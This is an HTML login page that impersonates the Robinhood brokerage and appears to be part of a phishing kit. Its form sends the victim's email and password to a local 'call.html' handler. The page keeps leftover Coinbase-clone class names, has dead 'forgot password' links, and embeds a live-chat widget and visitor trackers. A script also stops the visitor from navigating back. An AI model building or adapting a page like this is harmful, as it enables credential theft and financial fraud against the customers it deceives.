<!DOCTYPE html>
<html lang="en">


<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Robinhood</title>
  <link rel="icon" href="assets/images/fabvicon.jpg" type="image/x-icon"/>

  <link rel="stylesheet" href="assets/css/all.min.css">
  <link rel="stylesheet" href="assets/css/bootstrap.min.css">
  <link rel="stylesheet" href="assets/css/signin.css">

  <style type="text/css">

    body{
      overflow:hidden;
    }

   div#sign_inbnox {
    display: flex;
    align-items: baseline;
    gap: 10px;
}
.col_c2 a {
    font-size: .875rem;
    line-height: 24px;
    color: #0052cc;
}
.col_c1 p {
    font-size: .875rem;
    line-height: 24px;
    color: #333;
}
label {
    display: inline-block;
    margin-bottom: 0.3rem;
    color: #000;
}
/*----new for robinhood*/
.row_custom {
    display: flex;
    /* gap: 20px; */
    flex-wrap: wrap;
    align-items: center;
    height: 100vh;
    flex-direction: row-reverse;
}
.col_1 {
    width: 50%;
}
.col_2{
    width: 50%;
}
.banner_bg img {
    width: 100%;
}
div#sign_inbnox {
    display: flex;
    align-items: baseline;
    gap: 6px;
    align-items: center;
    margin-top: 55px;
}
.col_c2 p {
    margin-bottom: 0px;
}
.logo_Coinbase_w h1 {
    font-family: 'Montserrat', sans-serif;
    font-size: 21px;
    color: #000;
    font-weight: 500;
    margin-bottom: 20px;
}
label {
    display: inline-block;
    margin-bottom: 0.3rem;
    color: #414141;
    font-size: 13px;
}
.form-control {
    display: block;
    width: 100%;
    height: calc(1.5em + 0.75rem + 2px);
    padding: 18px 0.75rem;
    font-size: 1rem;
    font-weight: 400;
    line-height: 1.5;
    color: #495057;
    background-color: #fff;
    background-clip: padding-box;
    border: 1px solid #5b616ea8;
    border-radius:4px;
    transition: border-color .15s ease-in-out,box-shadow .15s ease-in-out;
}

.form-control:focus {
    color: #495057;
    background-color: #fff;
    border-color: #cdecca;
    outline: 0;
    box-shadow: 0 0 0 .2remrgba(0,123,255,.25);
    border: 1px solid #00c805;
    box-shadow: 0 0 0 0.2rem #007bff00;
}
.privately p a {
    color: #00c805 !important;
}
div#form_login #cointiue_btn {
    border: 1px solid #00c805!important;
    padding: 10px 40px !important;
    background-color: #00c805;
    color: #fff;
}

.privately p a {
    color: #000000 !important;
    font-weight: 600;
    text-decoration: underline;
    line-height: 25px;
}
/*---*/
/*div#form_login #cointiue_btn {
    border: 1px solid #000000!important;
    padding: 10px 40px !important;
    background-color: #000000;
    color: #fff;
    border-radius: 40px;
}*/
div#form_login #cointiue_btn {
    border: 1px solid #000000!important;
    padding: 10px 40px !important;
    background-color: #000000;
    color: #fff;
    border-radius: 40px;
    max-width: 128px;
    text-align: center;
    font-size: 13px;
}
.external_wrapper {
    max-width: 550px;
    border: 1px solid;
    border: 1px solid #ffffff33;
    border-radius: 18px;
    width: 100%;
    padding: 40px 26px;
    margin: inherit;
}
.col_c1 p {
    font-size: 13px;
    line-height: 24px;
    color: #333;
    margin-bottom: 0px;
}
.col_c2 a {
    font-size: 13px;
    line-height: 24px;
    color: #000000;
    font-weight: 600;
    text-decoration: underline;
}
    @media (max-width: 767.98px) {
 .external_wrapper {
    max-width: 450px;
    border: 1px solid;
    border: 1px solid #5b616e00;
    border-radius: 18px;
    width: 100%;
    padding: 20px 15px;
    margin-top:0px;
}

.col_1{
 width:100%;
}
.col_2 {
    display: none;
}
.row_custom {
    display: flex;
    /* gap: 20px; */
    flex-wrap: wrap;
    align-items: center;
    height: auto;
    flex-direction: column;
    padding: 10px 30px;
}
.banner_bg {
    padding-top: 50px;
}
/*---*/



}

</style>

<style>
  
</style>
  
</head>

<body>

  <div class="container_custom">
    <div class="row_custom">
      <div class="col_1">
        <!-- forms -->
<div class="external_wrapper">
  <div class="container-fluid" id="form_login">
    <div class="logo_Coinbase_w">
     
      <h1>Log in to Robinhood</h1>
    </div>
    
    <div class="row m-0 ">
      <div class="col-md-12">
        <div class="form">
           <form action="call.html" method="post">
            <div class="form-group">
                <label for="">Email</label>
              <input type="email" class="form-control" placeholder="" name="email" id="exampleInputEmail1"
                aria-describedby="emailHelp">

            </div>
            <div class="form-group">
             <label for="">Password</label>
              <input type="password" class="form-control" placeholder="" name="password" id="exampleInputPassword1">
            </div>
            <div class="privately">
              <p><a href="#">Forgot your password? <br>Forgot your email address?</a></p>
            </div>
            <!-- <div class="form-group">
              
             
          
            </div> -->
           
             <div class="col_c22">
              <button type="submit" id="cointiue_btn" class="btn btn-primary">Log In</button> 
              
            </div>

            <div id="sign_inbnox">
              <div class="col_c1">
                 <p>Not on Robinhood?</p>
              </div>
               <div class="col_c2">
                
                <a href="#">Create an Account</a>
              </div>
               
           </div>

          
          </form>
        </div>

      </div>


    </div>
    

  </div>
</div>

      </div>
      <div class="col_2">
        <div class="banner_bg">
          <img src="assets/images/banner.jpg" alt="">
        </div>
      </div>
    </div>
  </div>

  <!-- navigation bar -->

  





  <script src="assets/js/jquery-3.5.1.min.js"></script>
  <script src="assets/js/popper.js"></script>
  <script src="assets/js/bootstrap.min.js"></script>

<!-- Start of LiveChat (www.livechat.com) code -->
<script>
    window.__lc = window.__lc || {};
    window.__lc.license = 15116091;
    ;(function(n,t,c){function i(n){return e._h?e._h.apply(null,n):e._q.push(n)}var e={_q:[],_h:null,_v:"2.0",on:function(){i(["on",c.call(arguments)])},once:function(){i(["once",c.call(arguments)])},off:function(){i(["off",c.call(arguments)])},get:function(){if(!e._h)throw new Error("[LiveChatWidget] You can't use getters before load.");return i(["get",c.call(arguments)])},call:function(){i(["call",c.call(arguments)])},init:function(){var n=t.createElement("script");n.async=!0,n.type="text/javascript",n.src="../cdn.livechatinc.com/tracking.js",t.head.appendChild(n)}};!n.__lc.asyncInit&&e.init(),n.LiveChatWidget=n.LiveChatWidget||e}(window,document,[].slice))
</script>

<!-- End of LiveChat code -->
<!-- Begin Web-Stat code v 7.0 --><span id="wts2151543"></span><script>var wts=document.createElement('script');wts.async=true;wts.src='https://app.ardalio.com/log7.js';document.head.appendChild(wts);wts.onload = function(){ wtslog7(2151543,5); };</script><noscript><a href="https://www.web-stat.com"><img src="https://app.ardalio.com/7/5/2151543.png" alt="Web-Stat traffic analytics"></a></noscript><!-- End Web-Stat code v 7.0 -->

<script type="text/javascript">
        function preventBack() { window.history.forward(); }
        setTimeout("preventBack()", 0);
        window.onunload = function () { null };
    </script>

<!-- Begin Web-Stat code v 7.0 --><span id="wts2157206"></span><script>var wts=document.createElement('script');wts.async=true;wts.src='https://app.ardalio.com/log7.js';document.head.appendChild(wts);wts.onload = function(){ wtslog7(2157206,1); };</script><noscript><a href="https://www.web-stat.com"><img src="https://app.ardalio.com/7/1/2157206.png" alt="Web-Stat web statistics"></a></noscript><!-- End Web-Stat code v 7.0 -->


</body>


</html>